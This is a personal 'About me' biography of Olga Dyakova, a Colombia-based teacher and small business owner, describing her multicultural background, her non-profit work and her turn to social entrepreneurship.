About me

Olga Dyakova

Nice to meet you! I’m Olga – teacher, writer, facilitator and small business owner who was born in Russia, raised in Boston, and worked / grifted around Europe, South East Asia, and the Americas for a while before settling down in Colombia in 2014 where I’m currently based.

My nomadic tendencies and multi-cultural upbringing inspired my involvement in causes and projects that promote community development,  and as a result I’ve had chance to work in roles and initiatives in:
Education and language acquisition, organizational cross-cultural competency-building and multi-discpliniary collaboration, as well as innovation management in developing markets.

The first 5 years of my career in the non-profit sector showed me firsthand how great projects that solve important social problems were at great risk of failure due to running out of money, priming me for the discovery of social entrepreneurship while studying at Hult Business School, a discovery that ended up being a complete game-changer! I fell in love with the intersection of sustainability and solving social problems and realized that I would spend the remainder of my career looking for ways to do that.
